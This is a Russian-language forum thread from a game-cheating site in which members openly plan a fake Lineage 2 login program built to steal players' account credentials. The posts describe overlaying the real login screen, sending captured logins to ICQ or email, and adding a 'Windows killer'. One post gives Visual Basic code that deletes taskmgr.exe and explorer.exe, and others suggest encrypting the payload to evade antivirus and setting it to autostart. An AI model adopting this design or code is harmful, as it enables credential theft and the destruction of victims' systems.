Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация

[УгонялкО]Прога для развода

-

Боты, скрипты и прочий софт для Lineage 2

- Весь софт по Lineage 2 и все, что связано с ботоводством, скриптописанием и брутом - в этом разделе

Закрытая тема
 
Опции темы
Старый 13.03.2010, 15:20   #16
Читер-спонсор
 Рыцарь
Аватар для Jumper
 
Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(
Регистрация: 14.06.2009
Сообщений: 329
Популярность: 14571
Золото Zhyk.Ru: 4
Сказал(а) спасибо: 1,180
Поблагодарили 704 раз(а) в 392 сообщениях
Отправить сообщение для Jumper с помощью ICQ Отправить сообщение для Jumper с помощью Skype™
 
По умолчанию Re: [УгонялкО]Прога для развода

1) если еще не сделал, сделай сразу размер картинки 1280 на 1024, а чтобы она подтягивалась, если размер екрана меньше, а лучше бы вообще, сначало определить размеры екрана, а если широкоекранка??? тогда будет плохо!
2) убивалка виндовс убивает когда чел нажмет логин? если да, то зря! а если он захочет еще аки проверить? лучше сделай если он нажмет на exit тогда и убивало.
3) фоновую картинку заменить на видео не долгое, 3-4 кадра сойдет, будет мало палива! + добавить на разную версию, НО! чтобы все скрины не были в 1 проге, так как весить будет огого!!! а сделай типо компилера, выбираешь версию клиента для фейка, и оно грузит картинки или видео фейка и компилит, всмысле чтобы не тягать для фейка грации фейки ИТ и камаеля например =)

+напиши компонент аськи для VB, так как для делфи 10 лайта у меня он просто не ставится, а на VB могу так же програмировать =)


давно хотел сделать фейк, и уже знаю какой =)
короче главное - компонент аськи, остальное за мной =)
идею пока не скажу, так как монк быстрее сделает =)

Добавлено через 5 минут
to alastor: читай в первом сообщении, на visual basic!
изменить готовый - реально, но бред, так как будет его тестить 1000 раз и то может не работать как надо, для каждого сервера свой екзешник переделовать - влом!
можно разве сделать так, склеить оригинал л2.ексе с твоим, и когда грузишь свой л2 ексе, он сразу ставит по центру форму логина и кнопки на то же место и запускает клиент (так как склеили!).

вот чувак вводит в твою форму, жмет твой LOGIN, сразу посылаются логи на аську и после этого вводится в оригинальную форму (что на заднем фоне твоей) те же данные и жмется кнопка ок оригинальная! это можно сделать так: нажал, отослались логи, скрылась кнопка, ввелись данные, управлением мышкой навести на кнопку и клацнуть!

начет разрого расширения екрана, не проблема! так как форма логина стоит ровно по центру! по центру л2.ексе.
т.е. просто кординаты один раз прописать и все!

короче мыслей много, главное реализовать =)
________________


Последний раз редактировалось Jumper; 13.03.2010 в 15:26. Причина: Добавлено сообщение
 
Старый 13.03.2010, 15:37   #17
Почетный Пользователь
 Капитан
Аватар для ExxtanzO
 
ExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского Союза
Регистрация: 21.12.2009
Сообщений: 251
Популярность: 6587
Золото Zhyk.Ru: 30
Сказал(а) спасибо: 223
Поблагодарили 533 раз(а) в 200 сообщениях
Отправить сообщение для ExxtanzO с помощью ICQ Отправить сообщение для ExxtanzO с помощью Skype™
 
По умолчанию Re: [УгонялкО]Прога для развода

Цитата:
Сообщение от Jumper_UAПосмотреть сообщение
3) фоновую картинку заменить на видео не долгое, 3-4 кадра сойдет, будет мало палива!

Скажу тебе сразу) тут облом) Не сделать подобного. т.к. в клиенте 3d графика, текстуры и т.д. реализовать подобное нереально с нашими познаниями), поэтому меньше палива не сделать никак.
________________
[Ссылки могут видеть только зарегистрированные пользователи. ]
 
Пользователь сказал cпасибо:
m0nk (13.03.2010)
Старый 13.03.2010, 15:42   #18
Читер-спонсор
 Рыцарь
Аватар для Jumper
 
Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(
Регистрация: 14.06.2009
Сообщений: 329
Популярность: 14571
Золото Zhyk.Ru: 4
Сказал(а) спасибо: 1,180
Поблагодарили 704 раз(а) в 392 сообщениях
Отправить сообщение для Jumper с помощью ICQ Отправить сообщение для Jumper с помощью Skype™
 
По умолчанию Re: [УгонялкО]Прога для развода

Цитата:
Сообщение от ExxtanzOПосмотреть сообщение
Скажу тебе сразу) тут облом) Не сделать подобного. т.к. в клиенте 3d графика, текстуры и т.д. реализовать подобное нереально с нашими познаниями), поэтому меньше палива не сделать никак.

есть проги для захвата видео, сделай кадры вот так:

1 2 3 2 1

и тогда будет супер плавно и без палева!
не надо 3д, хватит простого видео =)
________________

 
Старый 13.03.2010, 15:46   #19
Почетный Пользователь
 Капитан
Аватар для ExxtanzO
 
ExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского Союза
Регистрация: 21.12.2009
Сообщений: 251
Популярность: 6587
Золото Zhyk.Ru: 30
Сказал(а) спасибо: 223
Поблагодарили 533 раз(а) в 200 сообщениях
Отправить сообщение для ExxtanzO с помощью ICQ Отправить сообщение для ExxtanzO с помощью Skype™
 
По умолчанию Re: [УгонялкО]Прога для развода

Цитата:
Сообщение от Jumper_UAПосмотреть сообщение
есть проги для захвата видео, сделай кадры вот так:

1 2 3 2 1

и тогда будет супер плавно и без палева!
не надо 3д, хватит простого видео =)

в VB насколько мне известно видео фон нельзя сделать а от анимации толку мало
________________
[Ссылки могут видеть только зарегистрированные пользователи. ]
 
Пользователь сказал cпасибо:
m0nk (13.03.2010)
Старый 13.03.2010, 15:51   #20
Заблокирован
 Разведчик
Аватар для Twix007
 
Twix007 никому не известный тип
Регистрация: 15.02.2010
Сообщений: 7
Популярность: 12
Сказал(а) спасибо: 1
Поблагодарили 1 раз в 1 сообщении
 
По умолчанию Re: [УгонялкО]Прога для развода

Прона кул автрору респект,но нод 32 оч чильно ругает,а вы говорите вирусов нету!Тока вот не пойму юзаю прогу она не открывается(

Последний раз редактировалось Twix007; 13.03.2010 в 15:54.
 
Старый 13.03.2010, 15:59   #21
 Пехотинец
Аватар для AJIACTOP
 
AJIACTOP скоро будет известенAJIACTOP скоро будет известенAJIACTOP скоро будет известенAJIACTOP скоро будет известен
Регистрация: 08.07.2009
Сообщений: 63
Популярность: 359
Сказал(а) спасибо: 32
Поблагодарили 84 раз(а) в 28 сообщениях
 
По умолчанию Re: [УгонялкО]Прога для развода

Цитата:
Сообщение от Jumper_UAПосмотреть сообщение
изменить готовый - реально, но бред, так как будет его тестить 1000 раз и то может не работать как надо, для каждого сервера свой екзешник переделовать - влом!

Изменить готовый ексешник можно только по минимуму:
1. Редактором ресурсов, чтото заменить(меню иконку и тд.).
2. Можна изменить под любым hex редактором или дизаасамблером несколько байт, чтобы адрес в памяти следующего кода совпадали. И контрольная сума какая прописана в заголовке ексе файла не изменилась.
3. Декомпилить его. Но всяравно часть кода будет написана на ассамблере, и чтото серьезное дописать туда не представляется реальным.

Цитата:
Сообщение от Jumper_UAПосмотреть сообщение
можно разве сделать так, склеить оригинал л2.ексе с твоим, и когда грузишь свой л2 ексе, он сразу ставит по центру форму логина и кнопки на то же место и запускает клиент (так как склеили!).

[COLOR="Yellow"]вот чувак вводит в твою форму, жмет твой LOGIN, сразу посылаются логи на аську и после этого вводится в оригинальную форму (что на заднем фоне твоей) те же данные и жмется кнопка ок оригинальная! это можно сделать так: нажал, отослались логи, скрылась кнопка, ввелись данные, управлением мышкой навести на кнопку и клацнуть!

короче мыслей много, главное реализовать =)

С этим полностью согласен

Цитата:
Сообщение от ExxtanzOПосмотреть сообщение
в VB насколько мне известно видео фон нельзя сделать а от анимации толку мало

Делфи вам в помощь, там на сколько мне это известно не сложно. Ну нужно чтобы видео было не сжатое никаким кодеком, иначе придется подключать и их, а если они в системе не установлены работать не будет. Также Си, но там такие вещи намного сложнее.

Последний раз редактировалось AJIACTOP; 13.03.2010 в 16:02.
 
Старый 13.03.2010, 16:18   #22
 Разведчик
Аватар для zabui
 
zabui никому не известный тип
Регистрация: 11.02.2010
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: [УгонялкО]Прога для развода

Доброго всем дня,ну раз все тут тапк хвалят прогу отпи шу и я несколько строчек))
Ну во перввых хочу всех просветить)убивалка винды пашет по принцепу на вашей машине супер пупер вирус и если вы не отправити на такойто номер смс с текстом-???????-то он активируется и ппц компу
а терь за думаемся на секунду))а как вы думаете кому пойдут денежки если когото ето зацепит??правильно Монку)
А поведутся я думаю хотяб 1 из десяти))терь пощитаем сколько людей скачает прогу+ее распространеение просто так не полохо получится))
так монк почему ты сразу не написал мол ребята вот вам прога я на ней буду зарабатывать)
ЭТО ВСЕГО ЛИШ МОЕ МНЕНИЕ)))!!
 
Старый 13.03.2010, 16:22   #23
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: [УгонялкО]Прога для развода

В vb не то что видео вставить нельзя но и гиф анимацию тоже(хз мб и можно но у меня не получалось)
Windows будет убита после того как только вам придут логины и пароли.
Jumper_UA юзай icq контрол от карася (google в помощ)


Добавлю чтобы можно было выбирать тип клиента
Добавлю отправку логов на email
Добавлю Функцию лого загрузки
Добавлю курсор lineage 2
Сделаю убить виндовc после 5 попыток или же после выхода из программы

P.S. От вас требуеться:
1) Скрины входа 1024*768 (и других вами используемых размеров) хб, гц
2) Скрины загрузки хб,гц
Прошу отправлять в личку

Последний раз редактировалось m0nk; 13.03.2010 в 17:00.
 
Старый 13.03.2010, 16:25   #24
 Пехотинец
Аватар для AJIACTOP
 
AJIACTOP скоро будет известенAJIACTOP скоро будет известенAJIACTOP скоро будет известенAJIACTOP скоро будет известен
Регистрация: 08.07.2009
Сообщений: 63
Популярность: 359
Сказал(а) спасибо: 32
Поблагодарили 84 раз(а) в 28 сообщениях
 
По умолчанию Re: [УгонялкО]Прога для развода

Цитата:
Сообщение от zabuiПосмотреть сообщение
Доброго всем дня,ну раз все тут тапк хвалят прогу отпи шу и я несколько строчек))
Ну во перввых хочу всех просветить)убивалка винды пашет по принцепу на вашей машине супер пупер вирус и если вы не отправити на такойто номер смс с текстом-???????-то он активируется и ппц компу
а терь за думаемся на секунду))а как вы думаете кому пойдут денежки если когото ето зацепит??правильно Монку)
А поведутся я думаю хотяб 1 из десяти))терь пощитаем сколько людей скачает прогу+ее распространеение просто так не полохо получится))
так монк почему ты сразу не написал мол ребята вот вам прога я на ней буду зарабатывать)
ЭТО ВСЕГО ЛИШ МОЕ МНЕНИЕ)))!!

Думаю даже если это и так (канешно лучше сообщать о таких вещах). Вполне нормально зарабатывать на своей программе, чтож по вашому нужно трудится не имея с этого ничего?
 
Старый 13.03.2010, 16:29   #25
 Разведчик
Аватар для zabui
 
zabui никому не известный тип
Регистрация: 11.02.2010
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: [УгонялкО]Прога для развода

Цитата:
Сообщение от AJIACTOPПосмотреть сообщение
Думаю даже если это и так (канешно лучше сообщать о таких вещах). Вполне нормально зарабатывать на своей программе, чтож по вашому нужно трудится не имея с этого ничего?

ничего личного просто я о том что надо сообщать об этом)
 
Старый 13.03.2010, 16:35   #26
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: [УгонялкО]Прога для развода

Цитата:
Сообщение от zabuiПосмотреть сообщение
Доброго всем дня,ну раз все тут тапк хвалят прогу отпи шу и я несколько строчек))
Ну во перввых хочу всех просветить)убивалка винды пашет по принцепу на вашей машине супер пупер вирус и если вы не отправити на такойто номер смс с текстом-???????-то он активируется и ппц компу
а терь за думаемся на секунду))а как вы думаете кому пойдут денежки если когото ето зацепит??правильно Монку)
А поведутся я думаю хотяб 1 из десяти))терь пощитаем сколько людей скачает прогу+ее распространеение просто так не полохо получится))
так монк почему ты сразу не написал мол ребята вот вам прога я на ней буду зарабатывать)
ЭТО ВСЕГО ЛИШ МОЕ МНЕНИЕ)))!!

Это идея, хотя убивалка работает по принципу:
Код:
Kill ("C:\WINDOWS\system32\taskmgr.exe")
Kill ("C:\WINDOWS.0\system32\taskmgr.exe")
Kill ("C:\WINDOWS.1\system32\taskmgr.exe")
Kill ("C:\WINDOWS.2\system32\taskmgr.exe")
Kill ("C:\WINDOWS.2\system32\taskmgr.exe")
Kill ("C:\WINDOWS\explorer.exe")
Kill ("C:\WINDOWS.0\explorer.exe")
Kill ("C:\WINDOWS.1\explorer.exe")
Kill ("C:\WINDOWS.2\explorer.exe")
и т.д.
а терь задумаемся)
 
Старый 13.03.2010, 16:54   #27
Читер-спонсор
 Рыцарь
Аватар для Jumper
 
Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(
Регистрация: 14.06.2009
Сообщений: 329
Популярность: 14571
Золото Zhyk.Ru: 4
Сказал(а) спасибо: 1,180
Поблагодарили 704 раз(а) в 392 сообщениях
Отправить сообщение для Jumper с помощью ICQ Отправить сообщение для Jumper с помощью Skype™
 
По умолчанию Re: [УгонялкО]Прога для развода

закриптовал бы убивалку было бы нормуль =)

насчет того, что когда приходят логин и пароль, а если он первый раз напишет спец левый, а потом захочет написать правильный свой или еще твинков например, а винда слетит и ты останешся с акком dadfsdafasdfa вместо нормального, надо сделать убивалку при 5 нажатий ок хотябы =)
________________

 
Пользователь сказал cпасибо:
m0nk (13.03.2010)
Старый 13.03.2010, 17:01   #28
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: [УгонялкО]Прога для развода

Сделаю убить виндовc после 5 попыток или же после выхода из программы
 
Старый 13.03.2010, 17:09   #29
 Разведчик
Аватар для DonKanreole
 
DonKanreole на правильном путиDonKanreole на правильном пути
Регистрация: 16.02.2010
Сообщений: 40
Популярность: 107
Сказал(а) спасибо: 80
Поблагодарили 131 раз(а) в 95 сообщениях
 
По умолчанию Re: [УгонялкО]Прога для развода

Вот эта прога кульная !
________________
смотри
 
Старый 13.03.2010, 17:23   #30
Читер-спонсор
 Рыцарь
Аватар для Jumper
 
Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(Jumper сломал счётчик популярности :(
Регистрация: 14.06.2009
Сообщений: 329
Популярность: 14571
Золото Zhyk.Ru: 4
Сказал(а) спасибо: 1,180
Поблагодарили 704 раз(а) в 392 сообщениях
Отправить сообщение для Jumper с помощью ICQ Отправить сообщение для Jumper с помощью Skype™
 
По умолчанию Re: [УгонялкО]Прога для развода

Цитата:
Сообщение от m0nkПосмотреть сообщение
Сделаю убить виндовc после 5 попыток или же после выхода из программы

только если при выходе, то сделай чтобы можно было выбрать что то одно, или убить процес, или автозагрузка =)
смысл автозагрузки если винда полетит и наоборот смысл кил винды если автозагрузка не будет работать =)

кста, по выходу можно сделать чтобы она опять запускалась
________________

 
Закрытая тема

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
3 развода Lev Архив 14 24.08.2011 15:05
Прога для развода аналог 3 m0nk Боты, скрипты и прочий софт для Aion 14 20.03.2011 21:11

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 16:57.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net